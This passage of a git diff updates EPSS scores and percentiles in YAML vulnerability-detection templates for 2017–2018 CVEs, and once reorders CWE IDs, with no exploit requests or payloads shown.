a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-7269 cwe-id: CWE-119 epss-score: 0.97121 - epss-percentile: 0.9971 + epss-percentile: 0.99711 cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 3745d211c8..96ac1b0bf6 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00204 - epss-percentile: 0.58116 + epss-percentile: 0.58144 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 81680ae070..a05957a4a0 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2017-7615 cwe-id: CWE-640 epss-score: 0.97404 - epss-percentile: 0.999 + epss-percentile: 0.99901 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 2bc32cbf87..d648f7b861 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.01361 - epss-percentile: 0.84771 + epss-percentile: 0.84777 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 31819d1a62..104a8cf9d3 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -16,7 +16,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-7925 - cwe-id: CWE-522,CWE-260 + cwe-id: CWE-260,CWE-522 epss-score: 0.35031 epss-percentile: 0.96644 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index d2c71bbdbc..55578ee202 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-8229 cwe-id: CWE-255 epss-score: 0.93519 - epss-percentile: 0.98825 + epss-percentile: 0.98826 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 609857e6bc..3aaf4d4900 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58765 + epss-percentile: 0.58796 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 7085675227..84b347692d 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - epss-percentile: 0.53653 + epss-percentile: 0.53679 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 3f32c0d7d1..0ffadaa019 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 - epss-percentile: 0.82279 + epss-percentile: 0.8229 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 459616de14..8b54a9e0a9 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.75511 + epss-percentile: 0.75535 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index f17596fee4..63c73867e5 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9822 cwe-id: CWE-20 epss-score: 0.96098 - epss-percentile: 0.9932 + epss-percentile: 0.99321 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 0f2d2c68db..af075779e3 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9833 cwe-id: CWE-22 epss-score: 0.35156 - epss-percentile: 0.96648 + epss-percentile: 0.96649 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index 5f0be1ff8f..32e27784cd 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9841 cwe-id: CWE-94 epss-score: 0.97477 - epss-percentile: 0.99963 + epss-percentile: 0.99962 cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 38fcd4eb57..77e3bc2f95 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-0127 cwe-id: CWE-306,CWE-200 epss-score: 0.09982 - epss-percentile: 0.9424 + epss-percentile: 0.94244 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 9939bd9c58..76488cccba 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 epss-score: 0.97359 - epss-percentile: 0.99865 + epss-percentile: 0.99866 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 04b80261e5..1920157ec5 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.61191 + epss-percentile: 0.61219 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 78a9c403ec..3a179b39ca 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.98399 + epss-percentile: 0.984 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index e8373acaf8..508959a018 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01552 - epss-percentile: 0.85749 + epss-percentile: 0.85754 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index b698e272a7..ee8d4f1d8d 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000600 cwe-id: CWE-200 epss-score: 0.95579 - epss-percentile: 0.99194 + epss-percentile: 0.99195 cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 01e3a087c1..ac14710f3e 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000671 cwe-id: CWE-601 epss-score: 0.00745 - epss-percentile: 0.78839 + epss-percentile: 0.7885 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 5c28b24e47..67ba56f61e 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000856 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41223 + epss-percentile: 0.41247 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index e4cc6522c1..03eec686e5 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000861 cwe-id: CWE-502 epss-score: 0.97173 - epss-percentile: 0.99739 + epss-percentile: 0.99738 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 7a175dd963..666bc69a30 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10093 cwe-id: CWE-862 epss-score: 0.06287 - epss-percentile: 0.92823 + epss-percentile: 0.92829 cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 7db757fff0..6b1bddf650 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46961 + epss-percentile: 0.46973 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 84b762465b..7d9fe8d7f3 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10201 cwe-id: CWE-22 epss-score: 0.04525 - epss-percentile: 0.91546 + epss-percentile: 0.91556 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 2e26db93ee..466f1e4c66 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10230 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46258 + epss-percentile: 0.46272 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 19d7fd422f..ccefd3232d 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10562 cwe-id: CWE-78 epss-score: 0.97499 - epss-percentile: 0.99973 + epss-percentile: 0.99972 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index ddc8c1fbf2..3bc441b422 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10822 cwe-id: CWE-22 epss-score: 0.12286 - epss-percentile: 0.94788 + epss-percentile: 0.9479 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index ee8213c19d..936dd14902 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10956 cwe-id: CWE-22 epss-score: 0.65072 - epss-percentile: 0.97528 + epss-percentile: 0.9753 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 563e2d1db8..c8945daeeb 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-11227 cwe-id: CWE-79 epss-score: 0.02667 - epss-percentile: 0.89261 + epss-percentile: 0.89268 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 0b60d793aa..f9189fd077 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.00903 - epss-percentile: 0.80978 + epss-percentile: 0.80989 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index ebdc316b30..a06616fa9b 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11473 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40385 + epss-percentile: 0.40406 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index e5f278b9ee..65ffd907c8 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.00151 - epss-percentile: 0.5112 + epss-percentile: 0.51146 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 7c6268c735..628682d59b 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 - epss-score: 0.96735 - epss-percentile: 0.9954 + epss-score: 0.96844 + epss-percentile: 0.99584 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index af39a89c44..37d81e9d39 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.01411 - epss-percentile: 0.85037 + epss-percentile: 0.85043 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 33377216fd..df452f5330 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12054 cwe-id: CWE-22 epss-score: 0.36029 - epss-percentile: 0.96693 + epss-percentile: 0.96694 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 61ad53d89d..66bdf47acb 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1207 cwe-id: CWE-94 epss-score: 0.01875 - epss-percentile: 0.87113 + epss-percentile: 0.87117 cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 72163743d9..b7941c4081 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2018-12095 cwe-id: CWE-79 - epss-score: 0.00407 - epss-percentile: 0.70929 + epss-score: 0.00333 + epss-percentile: 0.68026 cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1d885eb7e6..1f7387251f 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01545 - epss-percentile: 0.85707 + epss-percentile: 0.85713 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 96cdec16f9..aceefdfebf 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-12300 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45631 + epss-percentile: 0.45643 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index a0341d0028..079cc3531d 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45631 + epss-percentile: 0.45643 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 5c630115fc..cea50afb85 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.01096 - epss-percentile: 0.82821 + epss-percentile: 0.82832 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index dc2172dc17..a67a79a0bb 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2018-1273 cwe-id: CWE-20,CWE-94 epss-score: 0.97498 - epss-percentile: 0.99973 + epss-percentile: 0.99972 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 16e500c62d..2cc2274d1d 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12909 cwe-id: CWE-22 epss-score: 0.01119 - epss-percentile: 0.82997 + epss-percentile: 0.83008 cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 47461db53d..923ef97e05 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12998 cwe-id: CWE-79 epss-score: 0.97052 - epss-percentile: 0.99675 + epss-percentile: 0.99676 cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 56dfce65d5..2f4c80d8b3 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46258 + epss-percentile: 0.46272 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index a2b6207c90..b0369cbb5e 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.55038 + epss-percentile: 0.55063 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index d9d9c084f7..2370ba7411 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14013 cwe-id: CWE-79 epss-score: 0.00512 - epss-percentile: 0.74006 + epss-percentile: 0.74032 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 3b08c28201..0cdaeb67f7 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.24472 - epss-percentile: 0.96089 + epss-percentile: 0.96092 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index c83e330d11..2cd295bd8a 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14474 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28475 + epss-percentile: 0.28481 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 31d8f41679..a76bec7368 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-14574 cwe-id: CWE-601 epss-score: 0.01218 - epss-percentile: 0.83789 + epss-percentile: 0.83798 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 654c3cc6cc..4c364581a9 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14912 cwe-id: CWE-22 epss-score: 0.9702 - epss-percentile: 0.99658 + epss-percentile: 0.99659 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 2b8339ea10..06b8e473ef 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14916 cwe-id: CWE-732 epss-score: 0.00483 - epss-percentile: 0.73258 + epss-percentile: 0.73288 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index ec3543b5df..31e46de418 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14918 cwe-id: CWE-22 epss-score: 0.44897 - epss-percentile: 0.96988 + epss-percentile: 0.96994 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 30fd1dcd36..f651d813d7 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45631 + epss-percentile: 0.45643 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 0e4ede30d8..9975146aeb 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-15138 cwe-id: CWE-22 epss-score: 0.28185 - epss-percentile: 0.96308 + epss-percentile: 0.9631 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index f41672ab95..35c3431e34 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01414 - epss-percentile: 0.85048 + epss-percentile: 0.85054 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 7af0323f92..10eac24f1a 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ 